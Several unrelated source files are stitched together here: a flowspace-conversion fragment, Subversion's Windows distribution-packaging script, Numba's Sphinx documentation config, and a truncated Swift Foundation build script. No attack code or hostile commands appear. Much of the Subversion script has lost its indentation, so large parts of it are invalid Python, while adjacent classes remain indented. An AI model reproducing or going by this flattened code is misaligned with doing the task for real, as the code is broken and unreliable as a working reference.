              'tp_src_start': rf.tp_src_s,
              'vlan_id_end': rf.vlan_id_e,
              'vlan_id_start': rf.vlan_id_s}
        return fs

    def __format_params_to_reservation_model(self, req_params):
        """FlowVisor-style dict -> ReservationFlowSpace constructor kwargs."""
        fs = {"mac_src_s": req_params['dl_src_start'],
              "mac_src_e": req_params['dl_src_end'],
              "mac_dst_s": req_params['dl_dst_start'],
              "mac_dst_e": req_params['dl_dst_end'],
              "eth_type_s": req_params['dl_type_start'],
              "eth_type_e": req_params['dl_type_end'],
              "vlan_id_s": req_params['vlan_id_start'],
              "vlan_id_e": req_params['vlan_id_end'],
              "ip_src_s": req_params['nw_src_start'],
              "ip_src_e": req_params['nw_src_end'],
              "ip_dst_s": req_params['nw_dst_start'],
              "ip_dst_e": req_params['nw_dst_end'],
              "ip_proto_s": req_params['nw_proto_start'],
              "ip_proto_e": req_params['nw_proto_end'],
              "tp_src_s": req_params['tp_src_start'],
              "tp_src_e": req_params['tp_src_end'],
              "tp_dst_s": req_params['tp_dst_start'],
              "tp_dst_e": req_params['tp_dst_end'],
              "port_number_e": req_params['port_num_end'],
              "port_number_s": req_params["port_num_start"],
              "id": req_params["id"]}
        return fs

    def get_config(self):
        return self.__config

    def set_config(self, value):
        self.__config = value
| |
#
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
#
import os
import sys
import shutil
import getopt
try:
my_getopt = getopt.gnu_getopt
except AttributeError:
my_getopt = getopt.getopt
import glob
import traceback
try:
# Python >=3.0
import configparser
except ImportError:
# Python <3.0
import ConfigParser as configparser
# The script directory and the source base directory
_scriptdir = os.path.dirname(sys.argv[0])
_srcdir = os.path.join(_scriptdir, '..', '..')
# Distribution name/dir and README path — presumably populated later by
# option handling (not visible here); verify before relying on them.
_distname = None
_distdir = None
_readme = None
# Keep the real stdout/stderr so _exit() can still report to the console
# after the standard streams are redirected into the log file below.
_stdout = sys.stdout
_stderr = sys.stderr
_logname = os.path.abspath(os.path.join(_scriptdir, 'make_dist.log'))
_logfile = open(_logname, 'w')
sys.stdout = _logfile
sys.stderr = _logfile
def _exit(code=0):
    """Terminate the script; report a non-zero code on the real stderr."""
    if code:
        _stderr.write('make_dist: Exit %d\n' % (code,))
    sys.exit(code)
# Action classes
# Raised by Action.run() when a subclass fails to override it.
class MissingMethodImpl:
    pass
class Action:
    """Base class for distribution-tree build steps.

    Subclasses implement run(dir, cfg) to materialize files under *dir*,
    using *cfg* (a ConfigParser) for %(name)s path expansion.
    """

    def run(self, dir, cfg):
        raise MissingMethodImpl()

    def _expand(self, cfg, value):
        """Expand *value* through ConfigParser interpolation."""
        # Stash the raw value in a scratch option, then read it back so
        # the parser substitutes any %(name)s placeholders.
        cfg.set('__expand__', '__expand__', value)
        return cfg.get('__expand__', '__expand__')

    def _safe_expand(self, cfg, value):
        """Like _expand, but yield None instead of raising on failure."""
        try:
            result = self._expand(cfg, value)
        except:
            result = None
        return result

    def _copy_file(self, source, target):
        """Copy *source* to *target*, logging both paths."""
        for label, path in (('copy: %s', source), (' to: %s', target)):
            print(label % path)
        shutil.copyfile(source, target)
class File(Action):
    """Copy a single file into the distribution directory.

    When *name* is omitted, the basename of the (expanded) path is used.
    """

    def __init__(self, path, name=None):
        self.path = path
        self.name = name

    def run(self, dir, cfg):
        path = self._expand(cfg, self.path)
        name = self.name if self.name is not None else os.path.basename(path)
        self._copy_file(path, os.path.join(dir, name))
class OptFile(Action):
    """Copy a file if it exists; print a notice and skip otherwise."""

    def __init__(self, path, name=None):
        self.path = path
        self.name = name

    def run(self, dir, cfg):
        path = self._safe_expand(cfg, self.path)
        if path is None or not os.path.isfile(path):
            print('make_dist: File not found: %s' % self.path)
            return
        name = self.name if self.name is not None else os.path.basename(path)
        self._copy_file(path, os.path.join(dir, name))
class FileGlob(Action):
    """Copy every file matching a glob pattern into *dir*."""

    def __init__(self, pattern):
        self.pattern = pattern

    def run(self, dir, cfg):
        expanded = self._expand(cfg, self.pattern)
        for source in glob.glob(expanded):
            target = os.path.join(dir, os.path.basename(source))
            self._copy_file(source, target)
class InstallDocs(Action):
    """Generate documentation with doxygen and copy it into *dir*.

    Runs doxygen from the source root, then installs every file from the
    configured output path.
    """

    def __init__(self, config, path):
        self.config = config
        self.path = path

    def run(self, dir, cfg):
        config = self._expand(cfg, self.config)
        pattern = os.path.join(self._expand(cfg, self.path), '*.*')
        print('make_dist: Generating documentation')
        old_cwd = os.getcwd()
        try:
            os.chdir(_srcdir)
            _system('"%s" "%s"' % (cfg.get('tools', 'doxygen'), config))
        finally:
            # Always restore the working directory.  (The original code
            # restored it redundantly on both the except and else paths.)
            os.chdir(old_cwd)
        FileGlob(pattern).run(dir, cfg)
class InstallIconv(Action):
    """Build and install the apr-iconv ccs/ces modules via nmake."""

    def __init__(self, source, build_mode):
        self.source = source
        self.build_mode = build_mode

    def run(self, dir, cfg):
        source = os.path.abspath(self._expand(cfg, self.source))
        build_mode = self._expand(cfg, self.build_mode)
        print('make_dist: Installing apr-iconv modules')
        install = ('"%s" -nologo -f Makefile.win install'
                   + ' INSTALL_DIR="%s"'
                   + ' BUILD_MODE=%s BIND_MODE=%s') \
                  % (cfg.get('tools', 'nmake'),
                     os.path.abspath(dir),
                     build_mode,
                     'shared')
        old_cwd = os.getcwd()
        try:
            # Run the same install in each module subdirectory.
            for subdir in ('ccs', 'ces'):
                os.chdir(os.path.join(source, subdir))
                _system(install)
        finally:
            os.chdir(old_cwd)
class InstallJar(Action):
    """Package a directory tree into a jar file inside *dir*."""

    def __init__(self, jar, source):
        self.jar = jar
        self.source = source

    def run(self, dir, cfg):
        source = os.path.abspath(self._expand(cfg, self.source))
        jarfile = os.path.abspath(os.path.join(dir, self.jar))
        print('make_dist: Creating jar %s' % self.jar)
        command = '"%s" cvf "%s" -C "%s" .' % (
            cfg.get('tools', 'jar'), jarfile, source)
        _system(command)
class InstallMoFiles(Action):
    """Install gettext catalogs as <locale>/LC_MESSAGES/subversion.mo."""

    def __init__(self, source):
        self.source = source

    def run(self, dir, cfg):
        pattern = os.path.join(self._expand(cfg, self.source), '*.mo')
        for mofile in glob.glob(pattern):
            # 'de.mo' -> locale directory 'de'
            locale = os.path.basename(mofile)[:-3]
            localedir = os.path.join(dir, locale, 'LC_MESSAGES')
            os.makedirs(localedir)
            self._copy_file(mofile, os.path.join(localedir, 'subversion.mo'))
# This is the distribution tree
_disttree = {'': OptFile('%(readme)s', 'README.txt'),
'bin': (File('%(blddir)s/svn/svn.exe'),
File('%(blddir)s/svn/svn.pdb'),
File('%(blddir)s/svnsync/svnsync.pdb'),
File('%(blddir)s/svnsync/svnsync.exe'),
File('%(blddir)s/svnadmin/svnadmin.exe'),
File('%(blddir)s/svnadmin/svnadmin.pdb'),
File('%(blddir)s/svnlook/svnlook.exe'),
File('%(blddir)s/svnlook/svnlook.pdb'),
File('%(blddir)s/svndumpfilter/svndumpfilter.exe'),
File('%(blddir)s/svndumpfilter/svndumpfilter.pdb'),
File('%(blddir)s/svnserve/svnserve.exe'),
File('%(blddir)s/svnserve/svnserve.pdb'),
File('%(blddir)s/svnversion/svnversion.exe'),
File('%(blddir)s/svnversion/svnversion.pdb'),
File('%(blddir)s/svnrdump/svnrdump.exe'),
File('%(blddir)s/svnrdump/svnrdump.pdb'),
File('%(blddir)s/svnmucc/svnmucc.exe'),
File('%(blddir)s/svnmucc/svnmucc.pdb'),
File('%(blddir)s/../contrib/client-side/svn-push/svn-push.exe'),
File('%(blddir)s/../contrib/client-side/svn-push/svn-push.pdb'),
File('%(blddir)s/../tools/server-side/svnauthz-validate.exe'),
File('%(blddir)s/../tools/server-side/svnauthz-validate.pdb'),
File('%(blddir)s/../tools/server-side/svn-populate-node-origins-index.exe'),
File('%(blddir)s/../tools/server-side/svn-populate-node-origins-index.pdb'),
File('%(blddir)s/../tools/dev/svnraisetreeconflict/svnraisetreeconflict.exe'),
File('%(blddir)s/../tools/dev/svnraisetreeconflict/svnraisetreeconflict.pdb'),
File('%(blddir)s/mod_dav_svn/mod_dav_svn.so'),
File('%(blddir)s/mod_dav_svn/mod_dav_svn.pdb'),
File('%(blddir)s/mod_authz_svn/mod_authz_svn.so'),
File('%(blddir)s/mod_authz_svn/mod_authz_svn.pdb'),
FileGlob('%(blddir)s/libsvn_*/libsvn_*.dll'),
FileGlob('%(blddir)s/libsvn_*/libsvn_*.pdb'),
File('%(@apr)s/%(aprrel)s/libapr-1.dll'),
File('%(@apr)s/%(aprrel)s/libapr-1.pdb'),
File('%(@apr-iconv)s/%(aprrel)s/libapriconv-1.dll'),
File('%(@apr-iconv)s/%(aprrel)s/libapriconv-1.pdb'),
File('%(@apr-util)s/%(aprrel)s/libaprutil-1.dll'),
File('%(@apr-util)s/%(aprrel)s/libaprutil-1.pdb'),
File('%(@berkeley-db)s/bin/libdb%(bdbver)s.dll'),
File('%(@sasl)s/lib/libsasl.dll'),
File('%(@sasl)s/lib/libsasl.pdb'),
File('%(@sasl)s/utils/pluginviewer.exe'),
File('%(@sasl)s/utils/pluginviewer.pdb'),
File('%(@sasl)s/utils/sasldblistusers2.exe'),
File('%(@sasl)s/utils/sasldblistusers2.pdb'),
File('%(@sasl)s/utils/saslpasswd2.exe'),
File('%(@sasl)s/utils/saslpasswd2.pdb'),
OptFile('%(@berkeley-db)s/bin/libdb%(bdbver)s.pdb'),
OptFile('%(@sqlite)s/bin/sqlite3.dll'),
OptFile('%(@openssl)s/out32dll/libeay32.dll'),
OptFile('%(@openssl)s/out32dll/libeay32.pdb'),
OptFile('%(@openssl)s/out32dll/ssleay32.dll'),
OptFile('%(@openssl)s/out32dll/ssleay32.pdb'),
OptFile('%(@openssl)s/out32dll/openssl.exe'),
OptFile('%(@libintl)s/bin/intl3_svn.dll'),
OptFile('%(@libintl)s/bin/intl3_svn.pdb'),
FileGlob('%(@sasl)s/plugins/sasl*.dll'),
FileGlob('%(@sasl)s/plugins/sasl*.pdb'),
),
'doc': InstallDocs('%(srcdir)s/doc/doxygen.conf',
'%(srcdir)s/doc/doxygen/html'),
'iconv': InstallIconv('%(@apr-iconv)s', '%(aprrel)s'),
'include': FileGlob('%(svndir)s/include/*.h'),
'include/apr': FileGlob('%(@apr)s/include/*.h'),
'include/apr-iconv': FileGlob('%(@apr-iconv)s/include/*.h'),
'include/apr-util': FileGlob('%(@apr-util)s/include/*.h'),
'lib': (FileGlob('%(blddir)s/libsvn_*/*.lib'),
FileGlob('%(blddir)s/libsvn_*/*.pdb')),
'lib/apr': File('%(@apr)s/%(aprrel)s/libapr-1.lib'),
'lib/apr-iconv': File('%(@apr-iconv)s/%(aprrel)s/libapriconv-1.lib'),
'lib/apr-util': (File('%(@apr-util)s/%(aprrel)s/libaprutil-1.lib'),
File('%(@apr-util)s/%(aprxml)s/xml.lib'),
File('%(@apr-util)s/%(aprxml)s/xml.pdb'),
),
'lib/serf': (File('%(@serf)s/Release/serf.lib'),
),
'lib/sasl': (File('%(@sasl)s/lib/libsasl.lib'),
File('%(@sasl)s/lib/libsasl.pdb'),
),
'licenses': None,
'licenses/bdb': File('%(@berkeley-db)s/LICENSE'),
'licenses/serf': File('%(@serf)s/LICENSE'),
'licenses/zlib': File('%(@zlib)s/README'),
'licenses/apr-util': (File('%(@apr-util)s/LICENSE'),
File('%(@apr-util)s/NOTICE'),
),
'licenses/apr-iconv': (File('%(@apr-iconv)s/LICENSE'),
File('%(@apr-iconv)s/NOTICE'),
),
'licenses/apr': (File('%(@apr)s/LICENSE'),
File('%(@apr)s/NOTICE'),
),
'licenses/openssl': File('%(@openssl)s/LICENSE'),
'licenses/svn' : File('%(srcdir)s/COPYING'),
'licenses/cyrus-sasl' : File('%(@sasl)s/COPYING'),
'perl': None,
'perl/site': None,
'perl/site/lib': None,
'perl/site/lib/SVN': FileGlob('%(bindsrc)s/swig/perl/native/*.pm'),
'perl/site/lib/auto': None,
'perl/site/lib/auto/SVN': None,
# Perl module DLLs defined below
'python': None,
'python/libsvn': (FileGlob('%(binddir)s/swig/python/libsvn_swig_py/*.dll'),
FileGlob('%(binddir)s/swig/python/libsvn_swig_py/*.pdb'),
FileGlob('%(bindsrc)s/swig/python/*.py'),
FileGlob('%(binddir)s/swig/python/*.dll'),
FileGlob('%(binddir)s/swig/python/*.pdb'),
),
'python/svn': FileGlob('%(bindsrc)s/swig/python/svn/*.py'),
'javahl': (FileGlob('%(binddir)s/javahl/native/libsvn*.dll'),
FileGlob('%(binddir)s/javahl/native/libsvn*.pdb'),
InstallJar('svnjavahl.jar',
'%(bindsrc)s/javahl/classes'),
),
'ruby': None,
'ruby/lib': None,
'ruby/lib/svn': FileGlob('%(bindsrc)s/swig/ruby/svn/*.rb'),
'ruby/ext': None,
'ruby/ext/svn': None,
'ruby/ext/svn/ext':
(FileGlob('%(binddir)s/swig/ruby/*.dll'),
FileGlob('%(binddir)s/swig/ruby/*.pdb'),
FileGlob('%(binddir)s/swig/ruby/libsvn_swig_ruby/*.dll'),
FileGlob('%(binddir)s/swig/ruby/libsvn_swig_ruby/*.pdb'),
FileGlob('%(blddir)s/libsvn_*/*.dll'),
File('%(@berkeley-db)s/bin/libdb%(bdbver)s.dll'),
OptFile('%(@sqlite)s/bin/sqlite3.dll'),
OptFile('%(@libintl)s/bin/intl3_svn.dll'),
File('%(@apr)s/%(aprrel)s/libapr-1.dll'),
File('%(@apr-iconv)s/%(aprrel)s/libapriconv-1.dll'),
File('%(@apr-util)s/%(aprrel)s/libaprutil-1.dll')),
'share': None,
'share/locale': InstallMoFiles('%(srcdir)s/%(svnrel)s/mo'),
}
# Define Perl module DLLs
for module in ('Client', 'Core', 'Delta', 'Fs', 'Ra', 'Repos', 'Wc'):
_disttree['perl/site/lib/auto/SVN/_' + module] = (
File('%(binddir)s/swig/perl/native/_' + module + '.dll'),
File('%(binddir)s/swig/perl/native/_' + module + '.pdb'))
def _system(command):
def reopen_log():
global _logfile
_logfile = open(_logname, 'a')
sys.stdout = _logfile
sys.stderr = _logfile
try:
_logfile.close()
sys.stdout = _stdout
sys.stderr = _stderr
os.system('"%s >>%s 2>&1"' % (command, _logname))
except:
reopen_log()
raise
else:
reopen_log()
def _read_config():
# Read make_dist.conf first. Fill in the default package locations.
path_defaults = {'@berkeley-db':
os.path.abspath(os.path.join(_srcdir, 'db4-win32')),
'@apr':
os.path.abspath(os.path.join(_srcdir, 'apr')),
'@apr-iconv':
os.path.abspath(os.path.join(_srcdir, 'apr-iconv')),
'@apr-util':
os.path.abspath(os.path.join(_srcdir, 'apr-util')),
}
cfg = configparser.ConfigParser(path_defaults)
try:
cfg.readfp(open(os.path.join(_scriptdir, 'make_dist.conf'), 'r'))
except:
_stderr.write('Unable to open and read make_dist.conf\n')
_exit(1)
# Read the options config generated by gen-make.py
optcfg = configparser.ConfigParser()
optcfg.readfp(open(os.path.join(_srcdir, 'gen-make.opts'), 'r'))
# Move the runtime options into the DEFAULT section
for opt in optcfg.options('options'):
if not opt[:7] == '--with-':
continue
optdir = os.path.abspath(os.path.join(_srcdir, optcfg.get('options', opt)))
if not os.path.isdir(optdir):
print('make_dist: %s = %s' % (opt, optdir))
print('make_dist: Target is not a directory')
_exit(1)
cfg.set('DEFAULT', '@' + opt[7:], optdir)
# Also add the global parameters to the defaults
cfg.set('DEFAULT', 'srcdir', os.path.abspath(_srcdir))
cfg.set('DEFAULT', 'blddir', os.path.join(_srcdir,
'%(svnrel)s', 'subversion'))
cfg.set('DEFAULT', 'svndir', os.path.join(_srcdir, 'subversion'))
cfg.set('DEFAULT', 'binddir', '%(blddir)s/bindings')
cfg.set('DEFAULT', 'bindsrc', '%(svndir)s/bindings')
if _distname is not None:
cfg.set('DEFAULT', 'distname', os.path.abspath(_distname))
if _distdir is not None:
cfg.set('DEFAULT', 'distdir', os.path.abspath(_distdir))
if _readme is not None:
cfg.set('DEFAULT', 'readme', os.path.abspath(_readme))
return cfg
def _make_zip(suffix, pathlist, extras):
zipname = '%s%s.zip' % (_distname, suffix)
zipcmd = '"%s" -9 -r "%s"' % (cfg.get('tools', 'zip'), zipname)
for path in pathlist:
zipcmd = zipcmd + ' "' + _distname + path + '"'
if extras:
zipcmd = zipcmd + ' ' + extras
old_cwd = os.getcwd()
try:
os.chdir(_distdir)
if os.path.exists(zipname):
os.remove(zipname)
print('make_dist: Creating %s' % zipname)
_stdout.write('make_dist: Creating %s\n' % zipname)
_system(zipcmd)
except:
os.chdir(old_cwd)
raise
else:
os.chdir(old_cwd)
def _make_dist(cfg):
try:
cfg.add_section('__expand__')
distdir = os.path.abspath(os.path.join(_distdir, _distname))
if os.path.isdir(distdir):
shutil.rmtree(distdir)
os.makedirs(distdir)
dirlist = sorted(_disttree.keys())
for reldir in dirlist:
dir = os.path.join(distdir, reldir)
if not os.path.exists(dir):
print('make_dist: Creating directory %s' % reldir)
_stdout.write('make_dist: Creating directory %s\n' % reldir)
os.makedirs(dir)
action = _disttree[reldir]
if action is None:
continue
if isinstance(action, tuple):
for subaction in action:
subaction.run(dir, cfg)
else:
action.run(dir, cfg)
xpdb = '-x "*.pdb"'
_make_zip('', ('/README.txt', '/bin', '/httpd',
'/iconv', '/licenses', '/share/locale'), xpdb)
_make_zip('_dev', ('/README.txt', '/doc', '/include', '/lib'), xpdb)
_make_zip('_javahl', ('/README.txt', '/javahl'), xpdb)
_make_zip('_pdb', ('',), '-i "*.pdb"')
_make_zip('_pl', ('/README.txt', '/perl'), xpdb)
_make_zip('_py', ('/README.txt', '/python'), xpdb)
_make_zip('_rb', ('/README.txt', '/ruby', '/licenses', '/share/locale'),
xpdb)
_stdout.write('make_dist: Creating ruby gem\n')
gem_script = os.path.join(_scriptdir, 'make_gem.rb')
rubycmd = '"%s" "%s" --output-dir="%s"' % (cfg.get('tools', 'ruby'),
gem_script, _distdir)
rubycmd += ' "' + distdir + '\\README.txt"'
rubycmd += ' "' + distdir + '\\ruby"'
rubycmd += ' "' + distdir + '\\licenses"'
rubycmd += ' "' + distdir + '\\share"'
_system(rubycmd)
except:
traceback.print_exc(None, _stderr)
_exit(1)
if __name__ == '__main__':
opts, args = my_getopt(sys.argv[1:], '', ['readme='])
if len(args) != 2 or len(opts) > 1:
_stderr.write('Usage: make_dist.py [--readme=<file>] <distname> <distdir>\n')
_exit(2)
_distname, _distdir = args
if len(opts) != 0:
_readme = opts[0][1]
cfg = _read_config()
_make_dist(cfg)
| |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# Numba documentation build configuration file, created by
# sphinx-quickstart on Tue Dec 30 11:55:40 2014.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
try:
# Numba is installed
import numba
except ImportError:
# Numba is run from its source checkout
sys.path.insert(0, os.path.abspath('../..'))
import numba
on_rtd = os.environ.get('READTHEDOCS') == 'True'
if on_rtd:
# The following is needed to fix RTD issue with numpydoc
# https://github.com/readthedocs/sphinx_rtd_theme/issues/766
from conda.cli.python_api import run_command as conda_cmd
conda_cmd("install", "-c", "conda-forge", "sphinx_rtd_theme>=0.5.1", "-y")
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.intersphinx',
'sphinx.ext.todo',
#'sphinx.ext.mathjax',
'sphinx.ext.autodoc',
#'sphinx.ext.graphviz',
'numpydoc',
]
# Adding the github files extension
sys.path.append(os.path.abspath(os.path.join(".", "_ext")))
extensions.append('ghfiles')
todo_include_todos = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ['../_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Numba'
copyright = u'2012-2020, Anaconda, Inc. and others'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
version = '.'.join(numba.__version__.split('.')[:2])
# The full version, including alpha/beta/rc tags.
release = numba.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'sphinx_rtd_theme'
# All sphinx_rtd_theme options. Default values commented out; uncomment to
# change.
html_theme_options = {
'canonical_url': 'https://numba.readthedocs.io/en/stable/',
# 'logo_only': False,
# 'display_version': True,
# 'prev_next_buttons_location': 'bottom',
'style_external_links': True,
# 'vcs_pageview_mode': '',
'style_nav_header_background': '#00A3E0',
# Toc options
'collapse_navigation': False,
# 'sticky_navigation': True,
# 'navigation_depth': 4,
# 'includehidden': True,
# 'titles_only': False
}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = None
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
html_logo = "../_static/numba-white-icon-rgb.svg"
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
html_favicon = '../_static/numba-blue-icon-rgb.svg'
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['../_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'Numbadoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'numba.tex', u'Numba Documentation',
u'Anaconda', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'numba', 'Numba Documentation',
['Anaconda'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'Numba', 'Numba Documentation',
'Anaconda', 'Numba', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
# Configuration for intersphinx: refer to the Python standard library
# and the Numpy documentation.
intersphinx_mapping = {
'python': ('https://docs.python.org/3', None),
'numpy': ('http://docs.scipy.org/doc/numpy', None),
'llvmlite': ('http://llvmlite.pydata.org/en/latest/', None),
}
# numpydoc options
# To silence "WARNING: toctree contains reference to nonexisting document"
numpydoc_show_class_members = False
# -- Custom autogeneration ------------------------------------------------
def _autogenerate():
from numba.scripts.generate_lower_listing import gen_lower_listing
from numba.misc.help.inspector import write_listings
basedir = os.path.dirname(__file__)
gen_lower_listing(os.path.join(basedir,
'developer/autogen_lower_listing.rst'))
# Run inspector on supported packages
for package in ['builtins', 'math', 'cmath', 'numpy']:
write_listings(
package_name=package,
filename=os.path.join(
basedir, 'developer', 'autogen_{}_listing'.format(package),
),
output_format='rst',
)
_autogenerate()
def setup(app):
app.add_css_file('rtd-overrides.css')
| |
# This source file is part of the Swift.org open source project
#
# Copyright (c) 2014 - 2015 Apple Inc. and the Swift project authors
# Licensed under Apache License v2.0 with Runtime Library Exception
#
# See http://swift.org/LICENSE.txt for license information
# See http://swift.org/CONTRIBUTORS.txt for the list of Swift project authors
#
script = Script()
foundation = DynamicLibrary("Foundation")
foundation.GCC_PREFIX_HEADER = 'CoreFoundation/Base.subproj/CoreFoundation_Prefix.h'
if Configuration.current.target.sdk == OSType.Linux:
foundation.CFLAGS = '-DDEPLOYMENT_TARGET_LINUX -D_GNU_SOURCE '
foundation.LDFLAGS = '${SWIFT_USE_LINKER} -Wl,@./CoreFoundation/linux.ld -lswiftGlibc `icu-config --ldflags` -Wl,-defsym,__CFConstantStringClassReference=_TMC10Foundation19_NSCFConstantString -Wl,-Bsymbolic '
elif Configuration.current.target.sdk == OSType.FreeBSD:
foundation.CFLAGS = '-DDEPLOYMENT_TARGET_FREEBSD -I/usr/local/include -I/usr/local/include/libxml2 '
foundation.LDFLAGS = ''
elif Configuration.current.target.sdk == OSType.MacOSX:
foundation.CFLAGS = '-DDEPLOYMENT_TARGET_MACOSX '
foundation.LDFLAGS = '-licucore -twolevel_namespace -Wl,-alias_list,CoreFoundation/Base.subproj/DarwinSymbolAliases -sectcreate __UNICODE __csbitmaps CoreFoundation/CharacterSets/CFCharacterSetBitmaps.bitmap -sectcreate __UNICODE __properties CoreFoundation/CharacterSets/CFUniCharPropertyDatabase.data -sectcreate __UNICODE __data CoreFoundation/CharacterSets/CFUnicodeData-L.mapping -segprot __UNICODE r r '
if Configuration.current.build_mode == Configuration.Debug:
foundation.LDFLAGS += ' -lswiftSwiftOnoneSupport '
# For now, we do not distinguish between public and private headers (they are all private to Foundation)
# These are really part of CF, which should ultimately be a separate target
foundation.ROOT_HEADERS_FOLDER_PATH = "${PREFIX}/lib/swift"
foundation.PUBLIC_HEADERS_FOLDER_PATH = "${PREFIX}/lib/swift/CoreFoundation"
foundation.PRIVATE_HEADERS_FOLDER_PATH = "${PREFIX}/lib/swift/CoreFoundation"
foundation.PROJECT_HEADERS_FOLDER_PATH = "${PREFIX}/lib/swift/CoreFoundation"
foundation.PUBLIC_MODULE_FOLDER_PATH = "${PREFIX}/lib/swift/CoreFoundation"
foundation.CFLAGS += " ".join([
'-DU_SHOW_DRAFT_API',
'-DCF_BUILDING_CF',
'-DDEPLOYMENT_RUNTIME_SWIFT',
'-fconstant-cfstrings',
'-fexceptions',
'-Wno-shorten-64-to-32',
'-Wno-deprecated-declarations',
'-Wno-unreachable-code',
'-Wno-conditional-uninitialized',
'-Wno-unused-variable',
'-Wno-int-conversion',
'-Wno-unused-function',
'-I/usr/include/libxml2',
'-I./',
])
swift_cflags = [
'-I${BUILD_DIR}/Foundation/usr/lib/swift',
'-I/usr/include/libxml2'
]
if "XCTEST_BUILD_DIR" in Configuration.current.variables:
swift_cflags += [
'-I${XCTEST_BUILD_DIR}',
'-L${XCTEST_BUILD_DIR}',
'-I/usr/include/libxml2'
]
# Configure use of Dispatch in CoreFoundation and Foundation if libdispatch is being built
#if "LIBDISPATCH_SOURCE_DIR" in Configuration.current.variables:
